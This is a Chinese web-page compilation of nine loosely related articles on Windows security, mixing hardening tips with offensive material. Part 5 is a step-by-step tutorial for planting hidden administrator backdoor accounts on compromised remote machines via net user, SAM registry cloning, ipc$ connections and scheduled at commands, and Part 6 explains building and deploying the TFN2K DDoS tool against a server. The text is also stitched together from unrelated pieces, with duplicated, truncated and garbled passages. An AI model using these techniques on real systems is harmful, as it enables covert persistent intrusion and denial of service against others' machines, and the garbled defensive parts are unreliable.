您现在的位置：首页 > 实用文 > 其他范文

Windows系统用户摆脱攻击方法介绍

时间：2023-04-14 07:55:17 其他范文收藏本文下载本文

以下是小编精心整理的Windows系统用户摆脱攻击方法介绍，本文共20篇，希望对大家有所帮助。

Windows系统用户摆脱攻击方法介绍

篇1：Windows系统用户摆脱攻击方法介绍

上网的时候，经常会发现自己的网络防火墙在不停的发出警报，专家告诉你这就有可能是遭遇了的攻击，那有什么办法来摆脱这些不请自来的么？

一、取消文件夹隐藏共享

如果你使用了Windows

/XP系统，右键单击C盘或者其他盘，选择共享，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

原来，在默认状态下，Windows

2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“contentrdquo；。但是只要键入“计算机名或者IPCcontentrdquo；，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入

“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetSevices\Lanman\workstation\parameters”

新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

二、拒绝恶意代码

恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。

一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。

三、封死的“后门”

俗话说“无风不起浪”，既然能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让无处下手，便无后顾之忧！

1.删掉不必要的协议

对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS.

2.关闭“文件和打印共享”

文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择

“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”

主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

3.把Guest账号禁用

有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止知道自己的管理员账号，这会在很大程度上保证计算机安全。

4.禁止建立空连接

在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

方法一是修改注册表：打开注册表

“HKEY_LOCAL_MACHINE\System\CurrentControl\SetControl\LSA”

将DWORD值“Restrict Anonymous”的键值改为“1”即可，

四、隐藏IP地址

经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS（拒绝服务）攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。

五、关闭不必要的端口

在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton

Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

六、更换管理员帐户

Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator账号。

首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。

七、杜绝Guest帐户的入侵

Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。

禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。

八、安装必要的安全软件

我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有进攻我们的安全也是有保证的。

九、防范木马程序

木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被植入木马程序，常用的办法有：

在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。

在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。

将注册表里

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

下的所有以“Run”为前缀的可疑程序全部删除即可。

十、不要回陌生人的邮件

有些可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的账号和密码就进了的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。

十一、做好IE的安全设置

ActiveX控件和

Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！

另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和

Applets时有更多的选择，并对本地电脑安全产生更大的影响。

篇2：Windows系统用户如何巧妙摆脱攻击

上网的时候，经常会发现自己的网络防火墙在不停的发出警报，专家告诉你这就有可能是遭遇了的攻击，奥运即将到来，为了保证您能不受干扰的享受网络奥运信息，这里为您介绍一些摆脱这些不请自来的办法。

一、取消文件夹隐藏共享

如果你使用了Windows 2000/XP系统，右键单击C盘或者其他盘，选择共享，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

原来，在默认状态下，Windows 2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“计算机名或者IPC$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetSevices\Lanman\workstation\parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

二、拒绝恶意代码

三、封死的“后门”

俗话说“无风不起浪”，既然能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让无处下手，便无后顾之忧！

1.删掉不必要的协议

2.关闭“文件和打印共享”

虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

3.把Guest账号禁用

有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”，

另外，将Administrator账号改名可以防止知道自己的管理员账号，这会在很大程度上保证计算机安全。

4.禁止建立空连接

在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControl\SetControl\LSA”，将DWORD值“Restrict Anonymous”的键值改为“1”即可。

方法二是修改Windows 2000/XP的本地安全策略为“不允许SAM帐户和共享的匿名枚举”。

四、隐藏IP地址

经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。

五、关闭不必要的端口

在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序(比如Netwatch)，该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

六、更换管理员帐户

七、杜绝Guest帐户的入侵

八、安装必要的安全软件

我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有进攻我们的安全也是有保证的。

九、防范木马程序

木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被植入木马程序，常用的办法有：

在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。

在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。

将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。

十、不要回陌生人的邮件

有些可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的账号和密码就进了的邮箱。所以不要随便回陌生人的邮

篇3：Windows系统用户做好防范攻击的方法

上网的时候，经常会发现自己的网络防火墙在不停的发出警报，专家告诉你这就有可能是遭遇了的攻击，那有什么办法来摆脱这些不请自来的呢?

隐藏IP地址

提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。

关闭不必要的端口

在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序 (比如Netwatch)，该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

更换管理员帐户

首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的 Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。

篇4：如何创建关机用户Windows系统

想建一帐户，登录进去后自动shutdown/halt，这样就可以不把root的passwd告诉每个使用者了，请问有无可能，如何做？大致一个过程，等我验证后，再发一个，确实比较有用

想建一帐户，登录进去后自动shutdown/halt，这样就可以不把root的passwd告诉

每个使用者了。请问有无可能，如何做？大致一个过程，等我验证后，再发一个，确实比较有用啊。

OS是Solaris2.4。

建一个用户，将其shell设为关机命令。为了安全，这个用户的UID最好不要

设成0。

关机命令可以自己编写：

用root帐号登录(!!!!)，编以下一个文件：

#include

main

{

int tmp;

tmp = setuid(0);

if (tmp) {

system(“/sbin/shutdown -h now”);

}

else

fprintf(stderr, “Setuid Failure!\n”);

}

然后编译，比方说执行文件为shut

最后，利用chmod修改这个命令的属性：

chmod shut a+s

在建用户时，shell指向这个shut就行了，

原文转自：www.ltesting.net

篇5：Windows系统中多种隐藏超级用户方法

一、如何在图形界面建立隐藏的超级用户

图形界面下适用本地或开3389终端服务的肉鸡上，上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序)，如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows有两个注册表编辑器：regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户：hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入：regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制”。这里需要说明一下：最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入“regedit.exe”回车，启动注册表编辑器regedit.exe。打开键：

HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$“

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：

net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

二、如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。)

2、先与肉鸡建立连接,命令为：net use 13.50.97.238ipc$ ”12345678“ /user:”administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动)：

at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：

at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：

copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了，

6、再将编辑好的hacker.reg拷回肉鸡上

copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉鸡时间：net time 13.50.97.238 然后用at命令将用户hacker$删除：

at 13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除：用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238ipc$ “1234” /user:“hacker$” 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use 13.50.97.238ipc$ “12345678” /user:“administrator”

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表：

at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办?

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use 肉鸡ipipc$ “密码” /user:“超级用户名”来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话，你也可以远程开启，因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下：

1.想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下，我还没有想到好的办法，只能在命令行下用命令：“net user 用户名”一个一个来查看用户是否被禁用。

2.在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户(克隆之后，被禁用的用户hacker就会自动被激活了)： CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no

这样用户hacker就被禁用了(至少表面上是这样的)，当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令：net user 肉鸡ipipc$ “hacker密码” /user:“hacker” 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式：at 肉鸡ip 时间 net user hacker /active:no

6.原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的“F”键被超级用户administrator在注册表的“F”键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内“C”健还是原来的“C”键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。

五、注意的几点事项

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过，未在NT上测试。

篇6：用LINUX系统DDOS攻击WINDOWS

首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHAT LINUX进行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最有名的DDOS攻击工具TFN2K LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000SERVER 服务开有APACHE2 FTP VNC关系不大,主要攻击APACHE

废话不说了,开始设置服务器.

0.解压 tar -zxvf tfn2k.tgz

1.安装TFN2K

TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的LINUX需要不同的设置.

先修改src/ip.h

注释掉以下部分，否则编译出错，

/*struct in_addr

{

unsigned long int s_addr;

};*/

然后make进行编译

编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程,而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻击无效,更改密码可以执行mkpass进行更改,最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录所有的客户机IP地址(用VI编辑一个就可行了),格式为:

192.168.0.1

192.168.0.2

192.168.0.3

.....

然后在主服务器上运行./tfn

篇7：怎样防止蓝屏攻击Windows系统

怎样防止蓝屏攻击？蓝屏攻击的受害者指的是Microsoft的操作系统如 WINDOWS 95/98，因为WINDOWS系列的操作系统在崩溃的时候，通常是显示一个蓝色的屏幕，上面写着一些复杂的符号和数字，蓝屏攻击实际上是利用WINDOWS操作系统的内核缺陷，或采用大量的非法

怎样防止蓝屏攻击？

蓝屏攻击的受害者指的是Microsoft的操作系统如WINDOWS95/98，因为WINDOWS系列的操作系统在崩溃的时候，通常是显示一个蓝色的屏幕，上面写着一些复杂的符号和数字。蓝屏攻击实际上是利用WINDOWS操作系统的内核缺陷，或采用大量的非法格式数据包发向被攻击的机器，使WINDOWS操作系统的网络层受到破坏，而引起蓝屏当机，

目前比较常见的攻击方式有：

NETBIOS攻击：向有WINDOWS9x操作系统的机器的139号端口发送一个数据格式非法的数据包。典型的攻击工具有WINNUK。

IGMP攻击：向有WINDOWS9x操作系统的机器发送长度和数量都较大的IGMP数据包。典型的攻击工具有DOOM。

ICMP攻击：向有WINDOWS9x操作系统的机器发送数量较大，且类型随机变化的ICMP包。

▲对付上面几种攻击的方法是：

在互联网的安全级别设置中，将NETBIOS，IGMP，ICMP关闭，关闭这些协议不会影响你使用INTERNET

或者安装一个防火墙软件，常见的有天网防火墙，诺顿个人防火墙等。

原文转自：www.ltesting.net

篇8：用户license的问题。Windows系统

我把原来的license删除了，又加了新的license, 可是uname-X显示的却还是原来的license. 谁知道是什么原因啊？急！谢谢， CNL 回复于：-10-20 16:16:06 uname-X显示的是系统安装时输入的license,已连入/stand/ unix 内核里，变更license不会自动变更/st

我把原来的license删除了，又加了新的license,

可是uname -X 显示的却还是原来的license.

谁知道是什么原因啊？

急！谢谢。

CNL 回复于：2004-10-20 16:16:06uname -X显示的是系统安装时输入的license,已连入/stand/unix内核里，

变更license不会自动变更/stand/unix的原值。

可以这样修改:

# umount /stand

# mount /dev/boot /stand

# /etc/brand -a “<你的新licensenbspdata>” <你的新licensenbspnumber> <你的新licensenbspcode> /stand/unix

# /etc/brand -a “<你的新licensenbspdata>” <你的新licensenbspnumber> <你的新licensenbspcode> /etc/conf/pack.d/kernel/os.a

重起机器

lzwjt 回复于：2004-10-23 19:44:42# umount /stand

# mount /dev/boot /stand

是什么意思啊？我太菜了，看不明白啊！umount -X 显示我的是3.2v5.05，3.2v又是什么意思？

谢谢。。。。。。。。

CNL 回复于：2004-10-24 10:45:03/stand是系统分区，存放内核文件如unix的，为防止意外，这个分区系统开机后是只读安装的

但重新brand许可证操作要修改/stand/unix文件，必须要把/stand分区换成可写安装，

所以先umount掉再mount上，mount不带-oro参数就是可写安装

3.2是内核版本, 指unix内核为unix3.2版本，凡是采用unix3.2内核的unix都有相同或类似的内核，

3.2是目前大多数商业unix内核的鼻祖，比如linux内核1/2的基础就是3.2，

这个也是很多大老说学会SCO其他版本的unix也能玩的转的原因，

5.0.5是sco产品线上自己命名的版本

lzwjt 回复于：2004-10-24 11:50:27谢谢版主指导，但是我依然无法更换序列号，请辛苦以下，写写详细步骤，

1、是否要remove 原来得序列号，检测冲突是NUMBER，是否将NUMBER、CODE、DATE全部换掉。

2、是否要先remove。我下面得录入出现什么问题？

CNL 回复于：2004-10-24 13:38:36原license用scoadmin license去掉后要加新的license，注意必须在单用户下操作，

brand操作只是为了uname -X能显示新license，注意

“<新licensenbspdata>” 、<新licensenbspnumber>、 <新licensenbspcode>之间要有空格

xchen301 回复于：2004-10-24 13:46:58晕啊，CNL连这个也知道，汗。。。。。滔滔江水。。。。。

CNL 回复于：2004-10-24 14:39:09呵呵，我也是从各位大虾、前辈们的帖子看到的，只是转了一下而已

lzwjt 回复于：2004-10-24 16:38:33我有空格呀，请问是用〈〉还是用[]，还有DATA需要双引号吗？

CNL 回复于：2004-10-24 16:40:02只有data需要双引号，防止里面的shell特殊字符被转义掉

lzwjt 回复于：2004-10-24 18:02:08[quote:b5ee18d852=“CNL”]uname -X显示的是系统安装时输入的license,已连入/stand/unix内核里，

变更license不会自动变更/stand/unix的原值。

可以这样修改:

# umount /stand

# mount /dev/boot /stand

# /etc/brand -a “<你的新lic.......... p=”p“ quote:b5ee18d852=”quote:b5ee18d852]<“>

全部输入正常，但是REBOOT后，机器显示NO LICENSE。----没有加上。求救。

lzwjt 回复于：2004-10-24 19:18:301、总算换掉了。

2、另外一台没有REMOVE原来的，直接加了一个10用户的，显示成功，并连接kernel，时间非常长，估计死机，中断重起了，观察观察再说。

谢谢各位了！

simonzhan 回复于：2004-10-24 19:43:19自从CNL来了以后，精华多了很多，辛苦了兄弟！

原文转自：www.ltesting.net

篇9：Windows系统开机方法

主板上有实时时钟(Real Time Clock，RTC)负责系统的计时，我们可以通过RTC指定开机的时间，就像闹钟一样。不过，由于这项功能很少被人使用，部分虽然提供了此功能的主板(如INTEL原装主板)其实并不能在指定时间开机，所以用户在正式使用前最好先进行测试。

具体操作方式为：

1、电脑开机之后根据屏幕上的提示信息按“Del”键进入主板BIOS设置画面，与定时开机有关的设置功能一般放在“Power Management Setup”选项下。

2、在BIOS中有一项“RTC Alarm Poweron”的选项，应设成“Enabled”(启用)。之后用户可以具体设好定时开机的日期、小时、分钟、秒钟。

3、为了保证电脑准确无误地实现定时自动开机的功能，用户还要先检查一下主板BIOS中的系统时间是否与现实时间相同。

4、最后一步要记得将主板BIOS中的设置修改结果进行保存，即可在预设的时间定时开机。某些主板上还能够设成每日同一时间从BIOS自动开机，方法是将“RTC Alarm Date”一项改为“Every Day”。

